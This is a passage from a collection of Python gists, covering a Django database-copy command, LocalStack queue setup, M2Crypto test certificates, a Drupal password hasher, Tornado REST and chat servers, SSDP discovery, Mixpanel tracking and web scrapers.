fk_obj = getattr(instance, fk_field.name, None)
if fk_obj:
copy_instance(fk_field.rel.to, fk_obj, from_database, to_database, ignore_errors)
# copy m2m keys
meta = model._meta
for m2m in meta.many_to_many:
# store many-to-many related objects for every
# many-to-many relation of this object
m2m_qs = getattr(instance, m2m.name)
foreign_objs = m2m_qs.all()
for m2m_obj in foreign_objs:
copy_instance(m2m.rel.to, m2m_obj, from_database, to_database, ignore_errors)
# copy itself
original_data_json = serializers.serialize("json", [instance], use_natural_keys=use_natural_keys)
print original_data_json
new_data = serializers.deserialize("json", original_data_json, using=to_database)
for n in new_data:
try:
n.save(using=to_database)
except Exception as ex:
if ignore_errors:
print ex
else:
raise ex
def copy_model(model, from_database, to_database, ignore_errors=False, natural_key_models=None, skip_models=None):
if model_name(model) in (skip_models or []):
print "Skipping model %s" % model_name(model)
return
count = model.objects.using(from_database).count()
print "%s objects in model %s" % (count, model_name(model))
for obj in model.objects.using(from_database).all():
copy_instance(model, obj, from_database, to_database, ignore_errors, natural_key_models, skip_models)
def flush_model(model, database):
print "deleting all models '%s' in database '%s'" % (model.__name__, database)
model.objects.using(database).delete()
def get_encoded_models(name):
model_name = None
if ':' in name:
app_name, model_name = name.split(':')
else:
app_name = name
app = get_app(app_name)
models = get_models(app)
if model_name:
models = [model for model in models if model._meta.object_name == model_name]
return models
class Command(BaseCommand):
args = '<from_database to_database application1, application2 ...>'
help = 'copies models between databases'
option_list = BaseCommand.option_list + (
make_option('--delete',
action='store_true',
dest='delete',
default=False,
help='Delete the models in the target db first'),
make_option('--ignore-errors',
action='store_true',
dest='ignore-errors',
default=False,
help='Ignore save errors, just show them in the output'),
make_option('--natural-key-models',
dest='natural-key-models',
default='',
help='List of the models names to use with natural key serialization'),
make_option('--skip-models',
dest='skip-models',
default='',
help='List of the models names to skip'),
)
def handle(self, from_database, to_database, *args, **options):
apps_names = args
skip_models = options['skip-models'].split(',')
natural_key_models = options['natural-key-models'].split(',')
if options['delete']:
for name in apps_names:
for model in get_encoded_models(name):
print "Clearing model '%s'" % model.__name__
flush_model(model, to_database)
for name in apps_names:
models = get_encoded_models(name)
for model in models:
# import pudb; pu.db
print "Copying model '%s'" % model.__name__
copy_model(model, from_database, to_database, ignore_errors=options['ignore-errors'],
natural_key_models=natural_key_models, skip_models=skip_models)
```
#### File: hard-gists/20d90e1f21792a67eb6d27c445aa7a1f/snippet.py
```python
import sys
import yaml
from subprocess import call
def main():
f = open(sys.argv[1])
data = yaml.load(f)
create_queues(data['Local']['Queues'])
create_topics(data['Local']['Topics'])
print('All queues and topics created')
def create_queues(queues):
create_queue_command = 'aws --endpoint-url=http://localhost:4576 sqs create-queue --queue-name {}'
for queue in queues:
call(create_queue_command.format(queue['Name']), shell=True)
print('Queue {} created'.format(queue['Name']))
def create_topics(topics):
create_topic_command = 'aws --endpoint-url=http://localhost:4575 sns create-topic --name {}'
for topic in topics:
call(create_topic_command.format(topic['Name']), shell=True)
print('Topic {} created'.format(topic['Name']))
subscriptions = topic.get('Subscriptions', None)
if subscriptions:
for subscription in subscriptions:
subscribe_topic(topic, subscription)
def subscribe_topic(topic, subscription):
sns_arn = 'arn:aws:sns:us-east-1:123456789012:{}'.format(topic['Name'])
sqs_arn = 'arn:aws:sqs:us-east-1:123456789012:{}'.format(subscription['QueueName'])
create_subscription_command = 'aws --endpoint-url=http://localhost:4575 sns subscribe --topic-arn {} --protocol sqs --notification-endpoint {}'
call(create_subscription_command.format(sns_arn, sqs_arn), shell=True)
print('Queue {} subscribed to {}'.format(subscription['QueueName'], topic['Name']))
if __name__ == "__main__":
main()
```
#### File: hard-gists/2203822/snippet.py
```python
import sys
from PySide.QtCore import QObject, Slot
from PySide.QtGui import QApplication
from PySide.QtWebKit import QWebView
html = """
<html>
<body>
<h1>Hello!</h1><br>
<h2><a href="#" onclick="printer.text('Message from QWebView')">QObject Test</a></h2>
<h2><a href="#" onclick="alert('Javascript works!')">JS test</a></h2>
</body>
</html>
"""
class ConsolePrinter(QObject):
def __init__(self, parent=None):
super(ConsolePrinter, self).__init__(parent)
@Slot(str)
def text(self, message):
print message
if __name__ == '__main__':
app = QApplication(sys.argv)
view = QWebView()
frame = view.page().mainFrame()
printer = ConsolePrinter()
view.setHtml(html)
frame.addToJavaScriptWindowObject('printer', printer)
frame.evaluateJavaScript("alert('Hello');")
frame.evaluateJavaScript("printer.text('Goooooooooo!');")
view.show()
app.exec_()
```
#### File: hard-gists/2280363/snippet.py
```python
from pdfminer.pdfparser import PDFParser, PDFDocument
def parse(filename, maxlevel):
fp = open(filename, 'rb')
parser = PDFParser(fp)
doc = PDFDocument()
parser.set_document(doc)
doc.set_parser(parser)
outlines = doc.get_outlines()
for (level, title, dest, a, se) in outlines:
if level <= maxlevel:
print ' ' * level, title
if __name__ == '__main__':
import sys
if len(sys.argv) != 3:
print 'Usage: %s xxx.pdf level' % sys.argv[0]
sys.exit(2)
parse(sys.argv[1], int(sys.argv[2]))
```
#### File: hard-gists/2338529/snippet.py
```python
from tempfile import NamedTemporaryFile as namedtmp
import time
from M2Crypto import X509, EVP, RSA, ASN1
__author__ = '<EMAIL>'
__all__ = ['mk_temporary_cacert', 'mk_temporary_cert']
def mk_ca_issuer():
"""
Our default CA issuer name.
"""
issuer = X509.X509_Name()
issuer.C = "US"
issuer.CN = "ca_testing_server"
issuer.ST = 'CA'
issuer.L = 'San Francisco'
issuer.O = 'ca_yelp'
issuer.OU = 'ca_testing'
return issuer
def mk_cert_valid(cert, days=365):
"""
Make a cert valid from now and til 'days' from now.
Args:
cert -- cert to make valid
days -- number of days cert is valid for from now.
"""
t = long(time.time())
now = ASN1.ASN1_UTCTIME()
now.set_time(t)
expire = ASN1.ASN1_UTCTIME()
expire.set_time(t + days * 24 * 60 * 60)
cert.set_not_before(now)
cert.set_not_after(expire)
def mk_request(bits, cn='localhost'):
"""
Create a X509 request with the given number of bits in they key.
Args:
bits -- number of RSA key bits
cn -- common name in the request
Returns a X509 request and the private key (EVP)
"""
pk = EVP.PKey()
x = X509.Request()
rsa = RSA.gen_key(bits, 65537, lambda: None)
pk.assign_rsa(rsa)
x.set_pubkey(pk)
name = x.get_subject()
name.C = "US"
name.CN = cn
name.ST = 'CA'
name.O = 'yelp'
name.OU = 'testing'
x.sign(pk,'sha1')
return x, pk
def mk_cacert():
"""
Make a CA certificate.
Returns the certificate, private key and public key.
"""
req, pk = mk_request(1024)
pkey = req.get_pubkey()
cert = X509.X509()
cert.set_serial_number(1)
cert.set_version(2)
mk_cert_valid(cert)
cert.set_issuer(mk_ca_issuer())
cert.set_subject(cert.get_issuer())
cert.set_pubkey(pkey)
cert.add_ext(X509.new_extension('basicConstraints', 'CA:TRUE'))
cert.add_ext(X509.new_extension('subjectKeyIdentifier', cert.get_fingerprint()))
cert.sign(pk, 'sha1')
return cert, pk, pkey
def mk_cert():
"""
Make a certificate.
Returns a new cert.
"""
cert = X509.X509()
cert.set_serial_number(2)
cert.set_version(2)
mk_cert_valid(cert)
cert.add_ext(X509.new_extension('nsComment', 'SSL sever'))
return cert
def mk_casigned_cert():
"""
Create a CA cert + server cert + server private key.
"""
# unused, left for history.
cacert, pk1, _ = mk_cacert()
cert_req, pk2 = mk_request(1024, cn='testing_server')
cert = mk_cert(cacert)
cert.set_subject(cert_req.get_subject())
cert.set_pubkey(cert_req.get_pubkey())
cert.sign(pk1, 'sha1')
return cacert, cert, pk2
def mk_temporary_cacert():
"""
Create a temporary CA cert.
Returns a tuple of NamedTemporaryFiles holding the CA cert and private key.
"""
cacert, pk1, pkey = mk_cacert()
cacertf = namedtmp()
cacertf.write(cacert.as_pem())
cacertf.flush()
pk1f = namedtmp()
pk1f.write(pk1.as_pem(None))
pk1f.flush()
return cacertf, pk1f
def mk_temporary_cert(cacert_file, ca_key_file, cn):
"""
Create a temporary certificate signed by the given CA, and with the given common name.
If cacert_file and ca_key_file is None, the certificate will be self-signed.
Args:
cacert_file -- file containing the CA certificate
ca_key_file -- file containing the CA private key
cn -- desired common name
Returns a namedtemporary file with the certificate and private key
"""
cert_req, pk2 = mk_request(1024, cn=cn)
if cacert_file and ca_key_file:
cacert = X509.load_cert(cacert_file)
pk1 = EVP.load_key(ca_key_file)
else:
cacert = None
pk1 = None
cert = mk_cert()
cert.set_subject(cert_req.get_subject())
cert.set_pubkey(cert_req.get_pubkey())
if cacert and pk1:
cert.set_issuer(cacert.get_issuer())
cert.sign(pk1, 'sha1')
else:
cert.set_issuer(cert.get_subject())
cert.sign(pk2, 'sha1')
certf = namedtmp()
certf.write(cert.as_pem())
certf.write(pk2.as_pem(None))
certf.flush()
return certf
if __name__ == '__main__':
cacert, cert, pk = mk_casigned_cert()
with open('cacert.crt', 'w') as f:
f.write(cacert.as_pem())
with open('cert.crt', 'w') as f:
f.write(cert.as_pem())
f.write(pk.as_pem(None))
# Sanity checks...
cac = X509.load_cert('cacert.crt')
print cac.verify(), cac.check_ca()
cc = X509.load_cert('cert.crt')
print cc.verify(cac.get_pubkey())
# protips
# openssl verify -CAfile cacert.crt cacert.crt cert.crt
# openssl x509 -in cert.crt -noout -text
# openssl x509 -in cacert.crt -noout -text
```
#### File: hard-gists/2344345/snippet.py
```python
import hashlib
from django.contrib.auth.hashers import BasePasswordHasher
_ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
class DrupalPasswordHasher(BasePasswordHasher):
algorithm = "S"
iter_code = 'C'
salt_length = 8
def encode(self, password, salt, iter_code=None):
"""The Drupal 7 method of encoding passwords"""
if iter_code == None:
iterations = 2 ** _ITOA64.index(self.iter_code)
else:
iterations = 2 ** _ITOA64.index(iter_code)
hash = hashlib.sha512(salt + password).digest()
for i in range(iterations):
hash = hashlib.sha512(hash + password).digest()
l = len(hash)
output = ''
i = 0
while i < l:
value = ord(hash[i])
i = i + 1
output += _ITOA64[value & 0x3f]
if i < l:
value |= ord(hash[i]) << 8
output += _ITOA64[(value >> 6) & 0x3f]
if i >= l:
break
i += 1
if i < l:
value |= ord(hash[i]) << 16
output += _ITOA64[(value >> 12) & 0x3f]
if i >= l:
break
i += 1
output += _ITOA64[(value >> 18) & 0x3f]
longhashed = "%s$%s%s%s" % (self.algorithm, iter_code,
salt, output)
return longhashed[:54]
def verify(self, password, encoded):
hash = encoded.split("$")[1]
iter_code = hash[0]
salt = hash[1:1 + self.salt_length]
return encoded == self.encode(password, salt, iter_code)
```
#### File: hard-gists/2351057/snippet.py
```python
import numpy as np
from sklearn.linear_model.base import LinearModel
from sklearn.linear_model import LinearRegression, Lasso, lasso_path
def non_negative_garotte(X, y, alpha, tol=0.001):
coef_ols = LinearRegression(fit_intercept=False).fit(X, y).coef_
X = X * coef_ols[np.newaxis, :]
shrink_coef = Lasso(alpha=alpha, fit_intercept=False,
positive=True, normalize=False,
tol=tol).fit(X, y).coef_
# Shrunken betas
coef = coef_ols * shrink_coef
# Residual Sum of Squares
rss = np.sum((y - np.dot(X, coef)) ** 2)
return coef, shrink_coef, rss
def non_negative_garotte_path(X, y, eps=1e-3, n_alphas=100, alphas=None,
precompute='auto', **params):
coef_ols = LinearRegression(fit_intercept=False).fit(X, y).coef_
X = X * coef_ols[np.newaxis, :]
# Use lars_path even if it does not support positivity (much faster)
_, _, shrink_coef_path = lars_path(X, y, method='lasso')
# models = lasso_path(X, y, eps, n_alphas, alphas=None,
# precompute=precompute, Xy=None, fit_intercept=False,
# normalize=False, copy_X=True, verbose=False,
# **params)
#
# shrink_coef_path = np.array([m.coef_ for m in models]).T
coef_path = shrink_coef_path * coef_ols[:, None]
# Residual Sum of Squares
rss_path = np.sum((y[:, None] - np.dot(X, coef_path)) ** 2, axis=0)
return coef_path, shrink_coef_path, rss_path
class NonNegativeGarrote(LinearModel):
"""NonNegativeGarrote
Ref:
<NAME>. (1995), "Better Subset Regression Using the Nonnegative
Garrote," Technometrics, 37, 373-384. [349,351]
"""
def __init__(self, alpha, fit_intercept=True, tol=1e-4, normalize=False,
copy_X=True):
self.alpha = alpha
self.fit_intercept = fit_intercept
self.tol = tol
self.normalize = normalize
self.copy_X = copy_X
def fit(self, X, y):
X, y, X_mean, y_mean, X_std = self._center_data(X, y,
self.fit_intercept, self.normalize, self.copy_X)
self.coef_, self.shrink_coef_, self.rss_ = \
non_negative_garotte(X, y, self.alpha)
self._set_intercept(X_mean, y_mean, X_std)
if __name__ == '__main__':
import pylab as pl
from sklearn.utils import check_random_state
from sklearn.linear_model import lars_path
rng = check_random_state(None)
max_samples = 501
sample_size_range = xrange(25, max_samples, 25)
# true path
coef = np.array([1, 1, 0])
# for 4 different values of alpha
for alpha_val, fig_num in ((0.35, 1), (0.45, 2), (0.55, 3), (0.65, 4)):
# lists for plotting the two techniques results
hits_lars = []
hits_ng = []
print 'for alpha = ', alpha_val
# set up plots
pl.figure(fig_num, figsize=(5, 5))
pl.clf
pl.axis('tight')
pl.title('alpha = %.2f' % alpha_val )
pl.xlabel('Sample Size')
pl.ylabel('Frequency of Selecting Correct Models')
# vary the sample size from 25 up until 500
for sample_size in sample_size_range:
ng_path_correct = 0
lars_path_correct = 0
# create 100 data sets to test
for dataset_iter in xrange(100):
# create a dataset
X1 = rng.randn(sample_size)
X2 = rng.randn(sample_size)
X3 = np.sqrt(1 - 2 * alpha_val ** 2) * rng.randn(sample_size) \
+ alpha_val * (X1 + X2)
X = np.c_[X1, X2, X3]
y = np.dot(X, [1, 1, 0])
# get the lasso's coefficients
alphas, _, coefs = lars_path(X, y, method='lasso')
# get the non-negative garotte's coefficients
ng_coefs, _, _ = non_negative_garotte_path(X, y, eps=1e-5)
# test if either model's solution path matches the orinial model
if np.any(np.all(ng_coefs.astype(np.bool) == coef.astype(np.bool)[:, np.newaxis], axis=0)):
ng_path_correct += 1
if np.any(np.all(coefs.astype(np.bool) == coef.astype(np.bool)[:, np.newaxis], axis=0)):
lars_path_correct += 1
hits_lars.append(lars_path_correct / 100.)
hits_ng.append(ng_path_correct / 100.)
pl.plot(sample_size_range, hits_lars, 'r-')
pl.plot(sample_size_range, hits_ng, 'b-')
pl.xlim([0, max_samples])
pl.ylim([0, 1.1])
pl.show()
```
#### File: hard-gists/2416148/snippet.py
```python
import json
import tornado.web
import tornado.httpserver
import pymongo
from pymongo.objectid import ObjectId
class BackboneHandler(tornado.web.RequestHandler):
def initialize(self, auth=True):
self.auth = auth
def prepare(self):
""" authenticate user if required """
if self.auth:
if not self.current_user:
raise tornado.web.HTTPError(403)
def encode(self, data):
return json.dumps(data)
def decode(self, data):
return self.loads(data)
# HTTP Verbs / Backbone.js API
def get(self, *args):
""" return the collection or a model """
if self.is_get_collection(*args):
self.write(self.encode(self.get_collection(*args)))
else:
model = self.get_model(*args)
if model:
self.write(self.encode(model))
else:
raise tornado.web.HTTPError(404)
def post(self, *args):
""" create a model """
resp = self.create_model(self.decode(self.request.body), *args)
self.write(json.dumps(resp))
def put(self, *args):
""" update a model """
resp = self.update_model(self.decode(self.request.body), *args)
self.write(json.dumps(resp))
def delete(self, *args):
""" delete a model """
self.delete_model(*args)
# Extension points
def is_get_collection(self, *args):
""" return true if this get is for a collection """
return len(args) == 0
def create_model(self, model, *args):
""" create model and return a dictionary of updated attributes """
raise tornado.web.HTTPError(404)
def get_collection(self, *args):
""" return the collection """
raise tornado.web.HTTPError(404)
def get_model(self, *args):
""" return a model, return None to indicate not found """
raise tornado.web.HTTPError(404)
def update_model(self, model, *args):
""" update a model """
raise tornado.web.HTTPError(404)
def delete_model(self, *args):
""" delete a model """
raise tornado.web.HTTPError(404)
class MongoBackboneHandler(BackboneHandler):
def initialize(self, database=None, **kws):
BackboneHandler.initialize(self, **kws)
self.database = database
# BackboneHandler extension
def encode(self, data):
if not isinstance(data, pymongo.cursor.Cursor):
if '_id' in data:
data['_id'] = str(data['_id'])
return json.dumps(data)
else: # we have a cursor
data = list(data)
for d in data:
if '_id' in d:
d['_id'] = str(d['_id'])
return json.dumps(data)
def decode(self, data):
data = json.loads(data)
if '_id' in data:
data['_id'] = ObjectId(data['_id'])
return data
def create_model(self, model):
if not self.validate(model):
raise tornado.web.HTTPError(400)
updates = self.before_create(model)
model.update(updates)
mid = str(self.database.insert(model))
updates['_id'] = mid
return updates
def get_collection(self, *args):
return self.database.find(self.collection_query(*args))
def get_model(self, *args):
return self.database.find_one(self.model_query(*args))
def update_model(self, model, *args):
updates = self.before_update(model)
model.update(updates)
self.database.update(self.model_query(*args), model)
return updates
def delete_model(self, *args):
self.database.remove(self.model_query(*args))
# Extension points
def collection_query(self, *args):
""" return the query to find a collection from a list of url args """
return None
def model_query(self, *args):
""" return the query to find a model """
return {'_id': ObjectId(args[-1])}
def validate(self, model):
""" return False to to disallow this model """
return True
def before_create(self, model):
""" return any extra attributes you want to add to the model """
return {}
def before_update(self, model):
return {}
if __name__ == "__main__":
import sys
if len(sys.argv) > 1 and sys.argv[1] == 'backbone':
class TestHandler(BackboneHandler):
def get_current_user(self):
""" we want to check auth/noauth """
return 'test'
models = [dict(id=str(i), text='X' * i) for i in range(10)]
def _find(self, cid):
ms = [x for x in self.models if x['id'] == cid]
return ms[0] if ms else None
def create_model(self, model):
model['id'] = str(max([int(x['id']) for x in self.models]) + 1)
self.models.append(model)
print 'created', model
return dict(id = model['id'])
def get_collection(self):
return self.models
def get_model(self, cid):
return self._find(cid)
def update_model(self, model, cid):
print 'updating', cid, model
self.models[self.models.index(self._find(cid))] = model
def delete_model(self, cid):
print 'deleting'
self.models.remove(self._find(cid))
application = tornado.web.Application([
(r"/api", TestHandler),
(r"/api/(.+)", TestHandler),
],
debug=True,
static_path='static',
)
application.listen(9999)
tornado.ioloop.IOLoop.instance().start()
else:
import tornado.testing
import unittest
import urllib
class Handler(MongoBackboneHandler):
def before_create(self, model):
return dict(created=10)
class TestMongo(tornado.testing.AsyncHTTPTestCase):
def setUp(self):
self.conn = pymongo.Connection()
self.db = self.conn['bh_test']
self.coll = self.db['bh_test']
self.doc = self.coll.insert(dict(a=1, b=2))
tornado.testing.AsyncHTTPTestCase.setUp(self)
def tearDown(self):
tornado.testing.AsyncHTTPTestCase.tearDown(self)
self.conn.drop_database('bh_test')
def get_app(self):
return tornado.web.Application([
(r"/api/", Handler, dict(database=self.coll, auth=False)),
(r"/api/(.+)", Handler, dict(database=self.coll,
auth=False)),
],
debug=True,
static_path='static',
)
def test_get_model(self):
response = self.fetch('/api/' + str(self.doc), method='GET')
self.assertEqual(response.code, 200)
model = json.loads(response.body)
self.assertEqual(model['_id'], str(self.doc))
self.assertEqual(model['a'], 1)
def test_get_collection(self):
response = self.fetch('/api/', method='GET')
self.assertEqual(response.code, 200)
models = json.loads(response.body)
self.assertEqual(len(models), 1)
self.assertEqual(models[0]['a'], 1)
def test_create_model(self):
post_args = {'email': '<EMAIL>'}
response = self.fetch('/api/', method='POST',
body=json.dumps(post_args))
resp = json.loads(response.body)
self.assertTrue('_id' in resp)
self.assertEqual(resp['created'], 10)
def test_update_model(self):
response = self.fetch('/api/' + str(self.doc), method='GET')
self.assertEqual(response.code, 200)
model = json.loads(response.body)
model['foo'] = '1234'
response = self.fetch('/api/' + str(self.doc), method='PUT',
body=json.dumps(model))
self.assertEqual(response.code, 200)
doc = self.coll.find_one(self.doc)
self.assertEqual(doc['foo'], '1234')
def test_delete_model(self):
response = self.fetch('/api/' + str(self.doc), method='DELETE')
self.assertEqual(response.code, 200)
doc = self.coll.find_one(self.doc)
self.assertEqual(doc, None)
unittest.main()
```
#### File: hard-gists/2428250/snippet.py
```python
import socket
import struct
import sys
from httplib import HTTPResponse
from BaseHTTPServer import BaseHTTPRequestHandler
from StringIO import StringIO
import gtk
import gobject
LIB_ID = 'my_library'
MCAST_GRP = '172.16.58.3'
MCAST_PORT = 1900
SERVICE_LOCS = {'id1': '127.0.0.1:7766', 'id2': '127.0.0.1:7766'}
DISCOVERY_MSG = ('M-SEARCH * HTTP/1.1\r\n' +
'ST: %(library)s:%(service)s\r\n' +
'MX: 3\r\n' +
'MAN: "ssdp:discover"\r\n' +
'HOST: 172.16.58.3:1900\r\n\r\n')
LOCATION_MSG = ('HTTP/1.1 200 OK\r\n' +
'ST: %(library)s:%(service)s\r\n'
'USN: %(service)s\r\n'
'Location: %(loc)s\r\n'
'Cache-Control: max-age=900\r\n\r\n')
class Request(BaseHTTPRequestHandler):
def __init__(self, request_text):
self.rfile = StringIO(request_text)
self.raw_requestline = self.rfile.readline()
self.error_code = self.error_message = None
self.parse_request()
def send_error(self, code, message):
self.error_code = code
self.error_message = message
class Response(HTTPResponse):
def __init__(self, response_text):
self.fp = StringIO(response_text)
self.debuglevel = 0
self.strict = 0
self.msg = None
self._method = None
self.begin()
def interface_addresses(family=socket.AF_INET):
for fam, _, _, _, sockaddr in socket.getaddrinfo('', None):
if family == fam:
yield sockaddr[0]
def client(timeout=1, retries=5):
socket.setdefaulttimeout(timeout)
for _ in xrange(retries):
for addr in interface_addresses():
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
sock.bind((addr, 0))
msg = DISCOVERY_MSG % dict(service='id1', library=LIB_ID)
for _ in xrange(2):
# sending it more than once will
# decrease the probability of a timeout
sock.sendto(msg, (MCAST_GRP, MCAST_PORT))
try:
data = sock.recv(1024)
except socket.timeout:
pass
else:
response = Response(data)
print response.getheader('Location')
return
def server(timeout=5):
socket.setdefaulttimeout(timeout)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
sock.bind(('', MCAST_PORT))
mreq = struct.pack('4sl', socket.inet_aton(MCAST_GRP), socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
cond = gobject.IO_IN | gobject.IO_HUP
gobject.io_add_watch(sock, cond, handle_requests)
gtk.main()
def handle_requests(sock, _):
data, addr = sock.recvfrom(4096)
request = Request(data)
if not request.error_code and \
request.command == 'M-SEARCH' and \
request.path == '*' and \
request.headers['ST'].startswith(LIB_ID) and \
request.headers['MAN'] == '"ssdp:discover"':
service = request.headers['ST'].split(':', 2)[1]
if service in SERVICE_LOCS:
loc = SERVICE_LOCS[service]
msg = LOCATION_MSG % dict(service=service, loc=loc, library=LIB_ID)
sock.sendto(msg, addr)
return True
if __name__ == '__main__':
if len(sys.argv) > 1 and 'client' in sys.argv[1]:
client()
else:
server()
```
#### File: hard-gists/2511464/snippet.py
```python
import logging
from tornado.ioloop import IOLoop
from tornado.iostream import IOStream
from tornado.netutil import TCPServer
class ChatConnection(object):
def __init__(self, stream, address, connections):
logging.info('receive a new connection from %s', address)
self.state = 'AUTH'
self.name = None
self.connections = connections;
self.stream = stream
self.address = address
self.stream.set_close_callback(self._on_close)
self.stream.read_until('\n', self._on_read_line)
stream.write('Enter your name: ', self._on_write_complete)
def _on_read_line(self, data):
logging.info('read a new line from %s', self.address)
if self.state == 'AUTH':
name = data.rstrip();
if self.connections.has_key(name):
self.stream.write('Name taken, choose another: ', self._on_write_complete)
return
# message = 'Welcome, %s!\n' % (name)
self.stream.write('Welcome, %s!\n' % (name), self._on_write_complete)
self.connections[name] = self
self.name = name
self.state = 'CHAT'
message = '%s has arrived\n' % (self.name)
for _,conn in self.connections.iteritems():
if conn != self:
conn.stream.write(message, self._on_write_complete)
else:
message = '<%s> %s\n' % (self.name, data.rstrip())
for _,conn in self.connections.iteritems():
if conn != self:
conn.stream.write(message, self._on_write_complete)
def _on_write_complete(self):
logging.info('wrote a line to %s', self.address)
if not self.stream.reading():
self.stream.read_until('\n', self._on_read_line)
def _on_close(self):
logging.info('client quit %s', self.address)
if self.name != None:
del self.connections[self.name]
message = '%s has left\n' % (self.name)
for _,conn in self.connections.iteritems():
conn.stream.write(message, self._on_write_complete)
class ChatServer(TCPServer):
def __init__(self, io_loop=None, ssl_options=None, **kwargs):
logging.info('a echo tcp server is started')
TCPServer.__init__(self, io_loop=io_loop, ssl_options=ssl_options, **kwargs)
def handle_stream(self, stream, address):
ChatConnection(stream, address, chat_connections)
def main(connections):
chat_server = ChatServer()
chat_server.listen(8888)
IOLoop.instance().start()
chat_connections = {}
if __name__ == '__main__':
main(chat_connections)
```
#### File: hard-gists/256155/snippet.py
```python
import base64
from django.utils import simplejson
import urllib
from google.appengine.api import urlfetch
def track(event, properties=None):
"""
A simple function for asynchronously logging to the mixpanel.com API on App Engine
(Python) using RPC URL Fetch object.
@param event: The overall event/category you would like to log this data under
@param properties: A dictionary of key-value pairs that describe the event
See http://mixpanel.com/api/ for further detail.
@return Instance of RPC Object
"""
if properties == None:
properties = {}
token = "YOUR_TOKEN"
if "token" not in properties:
properties["token"] = token
params = {"event": event, "properties": properties}
data = base64.b64encode(simplejson.dumps(params))
request = "http://api.mixpanel.com/track/?data=" + data
rpc = urlfetch.create_rpc()
urlfetch.make_fetch_call(rpc, request)
return rpc
def track_funnel(funnel, step, goal, properties=None):
if properties == None:
properties = {}
properties["funnel"] = funnel
properties["step"] = step
properties["goal"] = goal
track("mp_funnel", properties)
```
#### File: hard-gists/2577781/snippet.py
```python
from queue import Queue
from threading import Thread
from functools import partial
import tornado.httpserver
import tornado.ioloop
import tornado.options
import tornado.web
from tornado import gen
from tornado.ioloop import IOLoop
import himitsu
def make_hash(text):
b = himitsu.Bcrypt()
return b.encode(text)
class WorkerThread(Thread):
def __init__(self, queue):
Thread.__init__(self)
self.queue = queue
self.daemon = True
self.start()
def run(self):
while True:
func, args, kwargs, callback = self.queue.get()
try:
result = func(*args, **kwargs)
if callback is not None:
IOLoop.instance().add_callback(partial(callback, result))
except Exception as e:
print(e)
self.queue.task_done()
class ThreadPool(object):
def __init__(self, num_threads):
self.queue = Queue()
for _ in range(num_threads):
WorkerThread(self.queue)
def add_task(self, func, args=(), kwargs={}, callback=None):
self.queue.put((func, args, kwargs, callback))
def wait_completion(self):
self.queue.join()
class BaseHandler(tornado.web.RequestHandler):
@property
def pool(self):
if not hasattr(self.application, 'pool'):
self.application.pool = ThreadPool(20)
return self.application.pool
class IndexHandler(BaseHandler):
@tornado.web.asynchronous
@gen.engine
def get(self):
result = yield gen.Task(
self.pool.add_task, make_hash, ('Test',)
)
self.write(result)
self.finish()
def main():
try:
tornado.options.parse_command_line()
application = tornado.web.Application([
(r'/', IndexHandler)
], debug=True)
http_server = tornado.httpserver.HTTPServer(application)
http_server.listen(8888)
tornado.ioloop.IOLoop.instance().start()
except KeyboardInterrupt:
print('Exit')
if __name__ == '__main__':
main()
```
#### File: hard-gists/25d48938c07b73541361/snippet.py
```python
import gspread
from newspaper import Article
from bs4 import BeautifulSoup
import requests
import re
import time
import feedparser
# Login with your Google account
gc = gspread.login('megmailaccount', 'mepassword')
# Open a worksheet from spreadsheet with one shot
wks = gc.open("Morning App feed").sheet1
data = wks.get_all_values()
scraped_urls = [i[3] for i in data[1:]]
def format(text):
#remove content inside round brackets
text = re.sub(r'\[(?:[^\]|]*\|)?([^\]|]*)\]', '', text)
#remove content inside round brackets
text = re.sub(r'\([^)]*\)', '', text)
text = text.strip()
return text
def addToSpreadsheet(title,url):
article= Article(url)
article.download()
article.parse()
image = article.top_image
wks.insert_row([time.strftime("%d/%m/%Y"),"some category",title,url,image],index=2)
def scrapeRedditArticles(limit=6,url="http://www.reddit.com/r/GetMotivated/search.json?q=flair%3Aarticle&sort=top&restrict_sr=on&t=week"):
reddit_url = url
headers = {'User-Agent' : 'this is a simple reddit bot by /u/tomarina'}
reddit_json = requests.get(reddit_url,headers=headers).json()
for i in reddit_json["data"]["children"][:6]:
if i['data']['is_self'] == True: continue
if i['data']['over_18'] == True: continue
if i["data"]["url"] in scraped_urls: continue
title = format(i["data"]["title"])
url = i["data"]["url"]
print title,url
addToSpreadsheet(title,url)
def scrapeQuotes(limit=3):
scrapeRedditArticles(limit,url="http://www.reddit.com/r/GetMotivated/search.json?q=flair%3Aimage&sort=top&restrict_sr=on&t=week")
def scrapeLifehacker(limit=4):
url = "http://lifehacker.com/tag/motivation"
data = requests.get(url).text
soup = BeautifulSoup(data)
for item in soup.select("div.post-list > div.post-wrapper")[:limit]:
title = item.select("h1.headline")[0].get_text()
url = item.select("h1.headline > a")[0].get("href")
if url in scraped_urls:continue
print title,url
addToSpreadsheet(title,url)
def scrapeHuffPost(limit=4):
url = "http://www.huffingtonpost.com/feeds/verticals/good-news/index.xml"
d = feedparser.parse(url)
for item in d["entries"][:limit]:
title = item['title']
url = item['link']
print title,url,pubdate
addToSpreadsheet(title,url)
def scrapeEntrepreneur(limit=4):
url = "http://www.entrepreneur.com/topic/motivation"
data = requests.get(url).text
soup = BeautifulSoup(data)
for item in soup.select("div.adrt-content > div.row > div.col-md-12 > div.pl")[:limit]:
title = item.select("h3 > a")[0].get_text()
url = item.select("h3 > a")[0].get('href')
url = "http://www.entrepreneur.com"+url
print title,url
addToSpreadsheet(title,url)
def dailyCron():
scrapeRedditArticles(2)
scrapeEntrepreneur(2)
scrapeQuotes(1)
scrapeLifehacker(2)
scrapeHuffPost(2)
scrapeEntrepreneur(2)
scrapeQuotes(1)
if __name__ == '__main__':
dailyCron()
```
#### File: hard-gists/261818/snippet.py
```python
import getpass
import os
import sys
## Application specific
SDK_DIR = '/usr/local/google_appengine'
APP_DIR = '/home/username/src/app'
APPID = 'something-awesome'
EMAIL = '<EMAIL>'
REMOTE_API_PATH = '/remote_api'
## Extra paths to be inserted into sys.path,
